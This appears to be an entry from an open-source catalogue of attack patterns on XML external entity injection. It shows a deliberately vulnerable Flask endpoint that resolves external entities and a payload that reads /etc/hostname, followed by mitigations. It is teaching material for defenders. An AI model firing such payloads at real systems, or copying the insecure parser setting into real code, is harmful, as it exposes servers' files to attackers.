/xxe-injection

A threat actor may interfere with an application's processing of extensible markup language (XML) data to view the content of a target's files

GNU Affero General Public License v3.0AGPL-3.0

A threat actor may interfere with an application's processing of extensible markup language (XML) data to view the content of a target's files

Example #1

  1. Threat actor sends a malicious request that contains a reference to an external entity (a system identifier)
  2. The target's XML processor replaces the external entity with the content dereferenced by the system identifier

Code

Target Logic

@app.route("/parse_xml",methods = ['POST'])
def parse_xml():
    parser = etree.XMLParser(resolve_entities=True)
    root = etree.fromstring(request.files['xml'].read(), parser)
    response = make_response(etree.tostring(root), 200)
    response.mimetype = "text/plain"
    return response

Target-in

<?xml version="1.0" encoding="UTF-8"?>
<getLastName>John01</getLastName>

Target-Out

Jone Doe

Target-in

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE malicious [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<getInfo>&xxe;</getInfo>

Target-Out

usystem01

Impact

High

Names

  • XXE injection
  • XEE injection
  • XML injection

Risk

  • Read data

Redemption

  • Secure processing
  • Disable DTD and XML external entity

ID

4b3566ce-3f7f-40d8-b882-09f59ca967b8

References